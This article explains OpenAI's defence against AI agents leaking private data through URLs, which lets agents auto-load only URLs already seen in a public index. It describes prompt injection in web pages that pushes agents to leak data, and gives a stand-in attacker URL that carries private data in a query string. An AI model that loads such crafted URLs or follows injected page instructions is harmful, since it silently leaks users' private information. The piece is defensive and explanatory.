Artificial intelligence no longer just replies: sometimes it acts for you, opens a page, follows a link, or loads an image to complete an answer. Sounds useful? Sure. Risky? Also. OpenAI published an explanation about a specific type of attack and how they mitigate it: data exfiltration via URL.
What is the risk: URLs that leak information without you noticing
Imagine an agent loads an image or a preview in the background. When the agent requests a URL, the server that receives it logs that address. What if that URL contains private information, like an email or a document title? An attacker can create an address like https://attacker.example/collect?data=<something private> and check their logs to see what the agent requested.
Worse: attacks can come with instructions inside the page itself, using prompt injection techniques that try to force the model to ignore its rules and leak data. Possible result? A “silent” data escape without you noticing.
Why blocking domains isn’t enough
The first idea is usually: “we only let the agent open known sites.” But that fails for two practical reasons.
-
Links can redirect. You start on a legitimate domain and end up on one controlled by an attacker. If you only check the initial domain, they can slip something past you.
-
Rigid allowlists hurt the experience. The web is huge: blocking a lot creates constant alerts and trains people to ignore them. That habit makes the system unsafe.
So, what did OpenAI do? They changed the question from “do we trust this site?” to “is this specific URL already publicly present on the independent web?”
The practical solution: verify public URLs
The idea is simple and effective in its simplicity. If a URL has already been observed publicly by an independent index (similar to how a search engine works), it’s much less likely to contain unique data from your conversation.
Here’s how they apply it in practice:
- If the URL matches an entry in the public index: the agent can load it automatically.
- If it doesn’t match: we treat it as unverified. The agent doesn’t load it by default; it asks for another site or requests an explicit action from you while showing a warning.
If a URL is already known publicly on the web without relying on user data, it’s less likely to contain personal secrets.
That approach prevents the agent from making silent requests to addresses that could have been constructed from your conversation.
What you’ll see and what you can do
When a link isn’t verified, the interface will tell you with messages like:
- The link is not verified.
- It may include information from your conversation.
- Verify it before continuing.
And what can you do?
- Don’t open the link if something looks suspicious.
- Ask the agent for a summary or an alternative source that is public.
- Inspect the link (domain, parameters) before allowing it to load.
This protects especially silent cases, like embedded images or previews, where you might not notice that something was requested.
Limitations: this isn’t a vaccine for everything
It’s important to be clear: this measure prevents a specific type of data leak via URLs, but it doesn’t guarantee that the web is safe in every sense.
- It doesn’t ensure that the content is trustworthy.
- It doesn’t stop social engineering attempts against you.
- It doesn’t remove malicious instructions inside a page.
That’s why OpenAI treats it as one layer within a multi-layered defense strategy: model mitigations against prompt injection, product controls, continuous monitoring, and red-teaming. Security is a process, not a box you tick once.
Final thought
The proposal is practical: prioritizing URLs that already exist publicly reduces the chance that an agent will reveal something of yours without permission. It’s a solution that balances security and usability by avoiding overly strict site lists.
The lesson? AI can help you a lot, but staying in control is still key. When an agent wants to open something that isn’t verified, it’s better to stop, ask, and confirm.
